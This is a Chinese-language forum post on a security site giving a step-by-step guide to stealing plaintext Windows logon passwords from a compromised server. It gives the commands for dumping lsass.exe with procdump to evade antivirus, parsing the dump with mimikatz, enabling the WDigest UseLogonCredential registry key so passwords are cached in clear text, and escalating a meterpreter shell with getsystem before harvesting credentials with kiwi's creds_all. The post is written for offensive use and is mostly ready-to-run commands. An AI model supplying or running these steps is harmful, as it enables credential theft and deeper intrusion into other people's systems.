安全矩阵

 找回密码
 立即注册
搜索
查看: 2387|回复: 0

获取Windows明文密码的小技巧

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-9-23 20:35:21 | 显示全部楼层 |阅读模式
原文链接:获取Windows明文密码的小技巧

在实战中,拿到一台Windows服务器权限,如果可以直接获取Windows明文密码的话,就可以更容易深入挖掘。本文分享几个获取Windows明文密码的技巧,简单直接且有效。

01、Procdump+Mimikatz
利用procdump+Mimikatz 绕过杀软获取Windows明文密码。
(1)工具准备:
ProcDump:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
mimikatz:

https://github.com/gentilkiwi/mimikatz/
(2)Windows Server 2008 R2提取明文密码
在目标机器上生成存储文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt
如图:成功从内存中提取明文密码。

02、Window 2012 R2抓取密码
在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。
(1)修改注册表

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
(2)用户administrator注销后重新登录,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

03、MSF kiwi模块
使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。
提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。
  1. meterpreter > getuid
  2. Server username: BYPASS-E97BA3FC\Administrator
  3. meterpreter > getsystem
  4. ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
  5. meterpreter > getuid
  6. Server username: NT AUTHORITY\SYSTEM
复制代码

加载kiwi模块:

load kiwi
列举系统中的明文密码:

creds_all



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 19:57 , Processed in 0.013080 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表